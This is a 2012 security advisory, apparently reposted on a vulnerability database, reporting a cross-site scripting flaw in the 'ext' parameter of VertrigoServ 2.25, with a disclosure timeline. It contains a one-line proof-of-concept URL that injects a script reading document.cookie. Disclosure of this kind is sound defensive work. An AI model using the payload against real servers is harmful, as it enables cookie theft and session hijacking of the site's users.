VertrigoServ 2.25 Cross Site Scripting

2012.01.07

Credit: Stefan Schurtz

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Advisory:		VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Advisory ID:		INFOSERVE-ADV2011-11
Author:			Stefan Schurtz
Contact:		security@infoserve.de
Affected Software:	Successfully tested on VertrigoServ 2.25
Vendor URL:		http://vertrigo.sourceforge.net/
Vendor Status:		informed

==========================
Vulnerability Description
==========================

VertrigoServ 2.25 'ext' parameter is prone to a Cross-site-Scripting vulnerability

==================
PoC-Exploit
==================

http://[target]/inc/extensions.php?mode=extensions&ext='"</script><script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

15-Dec-2011 - informed vendor
16-Dec-2011 - vendor feedback

========
Credits
========

Vulnerabilitiy found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt

References:

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-11.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

VertrigoServ 2.25 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.